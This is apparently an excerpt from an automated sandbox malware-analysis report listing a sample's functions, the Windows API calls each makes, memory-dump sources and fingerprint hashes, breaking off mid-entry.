                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB990E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32 ref: 00BB98CC
                                                                      • SetTextColor.GDI32(?,?), ref: 00BB98D6
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00BB98E9
                                                                      • GetStockObject.GDI32(00000005), ref: 00BB98F1
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongModeObjectStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1860813098-0
                                                                      • Opcode ID: 4b24206c40f967b7e1ee0692b8fbfb354aba643e1f2f40f9ebad956030a36136
                                                                      • Instruction ID: 97ed17d70d1a1e0cc90f8b9e2cb4bd75c155870085e2483ecbf5f99e71a8551a
                                                                      • Opcode Fuzzy Hash: 4b24206c40f967b7e1ee0692b8fbfb354aba643e1f2f40f9ebad956030a36136
                                                                      • Instruction Fuzzy Hash: B50168336862109BC7128F25ECA5FFE3BA0DB66765B09009DF782DB2A1CBB54981C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C02DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00C02DDD
                                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 00C02DE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: c9c52c2a7482a42d1d8b89ee3733b6db7c29eeb9a69e913ba47eb2e097670057
                                                                      • Instruction ID: f6f4c6068fa098152cdf3f5f61360fa50b29884920f52dc2a281d1323378ca56
                                                                      • Opcode Fuzzy Hash: c9c52c2a7482a42d1d8b89ee3733b6db7c29eeb9a69e913ba47eb2e097670057
                                                                      • Instruction Fuzzy Hash: 23E01271511724BBDB201B739C8EFEF7E6CEF56BA1F400115F505E10909AA5C941D7B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C38863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BB9693
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                                        • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C38887
                                                                      • LineTo.GDI32(?,?,?), ref: 00C38894
                                                                      • EndPath.GDI32(?), ref: 00C388A4
                                                                      • StrokePath.GDI32(?), ref: 00C388B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: d9c9373388bdf2cea086e0ad96db27897078d0799bb066647faee617e0b802b9
                                                                      • Instruction ID: cb04907acd1de4c003d39435b199a5d88053c01d3bf1a17d706b81b102169c1f
                                                                      • Opcode Fuzzy Hash: d9c9373388bdf2cea086e0ad96db27897078d0799bb066647faee617e0b802b9
                                                                      • Instruction Fuzzy Hash: 4AF03A36055658BADB126F98AC09FCE3B69AF06710F048000FB12750E2C7B55651DBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 4037423528-0
                                                                      • Opcode ID: 09848b27196b1ca2b084e286c1bfa038ee74779f33d45d4e4fa20c39bfb30433
                                                                      • Instruction ID: b68195b43489252511bda0ed74c57f76570a7fc7e9d3bebc020e2ac3b7fe46db
                                                                      • Opcode Fuzzy Hash: 09848b27196b1ca2b084e286c1bfa038ee74779f33d45d4e4fa20c39bfb30433
                                                                      • Instruction Fuzzy Hash: BDE06531254244AEDB215B74AC49BEC3F60EB11335F048259F7F5650E1C7714644AB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00C01089,?,?,?,00C011D9), ref: 00C01634
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0163B
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C011D9), ref: 00C01648
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0164F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                                      • Instruction ID: cf4c3348cc1877c5daed7b1877e49d3afe94742b7e078e3abac7f937259ec3c1
                                                                      • Opcode Fuzzy Hash: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                                      • Instruction Fuzzy Hash: 0DE08C32612211EBD7201FA0AE8DB8F7B7CEF447A2F188808F655E9090E7358544CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BFD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00BFD858
                                                                      • GetDC.USER32(00000000), ref: 00BFD862
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                                      • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                                      • Instruction ID: cb6f619aac62b18cbf8b7640cacc2efe2ad4cb9ae9ae08284dd15beed07017db
                                                                      • Opcode Fuzzy Hash: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                                      • Instruction Fuzzy Hash: 53E0E5B1810204DFCB41AFA0D88976DBBF2AB08310F108049F856A7260C7398905AF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BFD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00BFD86C
                                                                      • GetDC.USER32(00000000), ref: 00BFD876
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                                      • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                                      • Instruction ID: dbdbc3563191a9768c86078632e61a9e83281ce22ffd3c1cb4049ece75dc3d20
                                                                      • Opcode Fuzzy Hash: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                                      • Instruction Fuzzy Hash: 95E012B1810200EFCB40AFA0D88D76DBFF1BB08310F108048F85AF7260CB389901AF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C14D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C14ED4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Connection_wcslen
                                                                      • String ID: *$LPT
                                                                      • API String ID: 1725874428-3443410124
                                                                      • Opcode ID: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                                      • Instruction ID: d86817c19c2b9f8948324cd0fad8c0833a973262111e00f06d1de6643558f259
                                                                      • Opcode Fuzzy Hash: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                                      • Instruction Fuzzy Hash: F8915175A042049FCB18DF98C494EE9BBF1BF46304F198099E41A9F392D731EE86DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BCE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00BCE30D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                                      • Instruction ID: de6120ff4715f0bac8d1289c299f3a3f8154be91922a9b84c457209922f2bc7a
                                                                      • Opcode Fuzzy Hash: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                                      • Instruction Fuzzy Hash: 84517BA1A4C201D7DB167714C942BFDABE8EB40740F6449EEF0A5863A9FF34CC859A46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: b519695c84752ed5e97e4d638c6b147bd6c1d9816107c9799afeadedb463c193
                                                                      • Instruction ID: ac4c021884c078cf4735990cedd3997807001cdabe35f301a15e8e3288b7266a
                                                                      • Opcode Fuzzy Hash: b519695c84752ed5e97e4d638c6b147bd6c1d9816107c9799afeadedb463c193
                                                                      • Instruction Fuzzy Hash: CD510F7550424A9FDB15EF28C081AFE7BE4EF16310F2440E5E9A19B2E0DA74DD46CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00BBF2A2
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BBF2BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                                      • Instruction ID: 20a9d03745f036afe3067ad962ee0e52df544b37c577cc08a34bf989ab0a1279
                                                                      • Opcode Fuzzy Hash: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                                      • Instruction Fuzzy Hash: 4551237241C7449BD320AF10DC86BAFBBF8FB85300F81889DF199511A5EB718569CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C25745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_wcslen
                                                                      • String ID: CALLARGARRAY
                                                                      • API String ID: 157775604-1150593374
                                                                      • Opcode ID: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                                      • Instruction ID: 5f9e55dbcfaffabfd8b53fe8a4017276893b158f46b6d92c17cb1aa965e0f98b
                                                                      • Opcode Fuzzy Hash: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                                      • Instruction Fuzzy Hash: 3B41E131E002199FCB04DFA9D8819FEBBF4FF59324F104069E415AB291E7B09E81CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C1D130
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C1D13A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                                      • Instruction ID: 1c692efbab8562a6a57be018727d26126869ebc921a963636188c7974e26314d
                                                                      • Opcode Fuzzy Hash: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                                      • Instruction Fuzzy Hash: 90313E71D00219ABCF15EFA5CC85EEEBFB9FF06350F100059F825A6161D735AA46DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C3356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00C33621
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00C3365C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                                      • Instruction ID: ef2808cdfc1f5453755a7530b46a9b1b97ff1d7d7888187d3c0f755383a8ff3a
                                                                      • Opcode Fuzzy Hash: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                                      • Instruction Fuzzy Hash: F9318B71120244AEDB209F28DC81FFB73B9FF88724F009619F9A5D7290DA35AE91D760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C34537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C3461F
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C34634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: 18cb2abcc48e4c245cc59fe9d363151cee6d7dcb3d8d4bc5ebd6aa2140b24571
                                                                      • Instruction ID: 19423df43a5da8749fa41ae678531598305918ae0017ba468f61fc4b6ab622ab
